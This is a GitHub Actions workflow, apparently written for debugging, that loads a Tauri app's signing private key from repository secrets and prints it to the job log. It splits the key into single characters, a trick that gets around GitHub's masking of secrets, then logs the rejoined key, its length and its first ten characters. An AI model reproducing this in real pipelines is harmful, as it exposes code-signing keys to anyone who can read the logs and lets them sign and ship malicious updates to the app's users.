name: Echo Variables

on:
  push:
    branches:
      - sy-2911-fix-windows-console-auto-update

env:
  TAURI_SIGNING_PRIVATE_KEY_PASSWORD: ${{ secrets.TAURI_KEY_PASSWORD }}
  TAURI_SIGNING_PRIVATE_KEY: ${{ secrets.TAURI_PRIVATE_KEY }}

jobs:
  echo:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/github-script@v7
        with:
          script: |
            const key = process.env.TAURI_SIGNING_PRIVATE_KEY;
            // Turn the string into an array of characters
            const chars = key.split("");
            console.log(chars)
            console.log(chars.join(""))
            console.log("Key length:", chars.length);
            console.log("First 10 chars:", chars.slice(0, 10));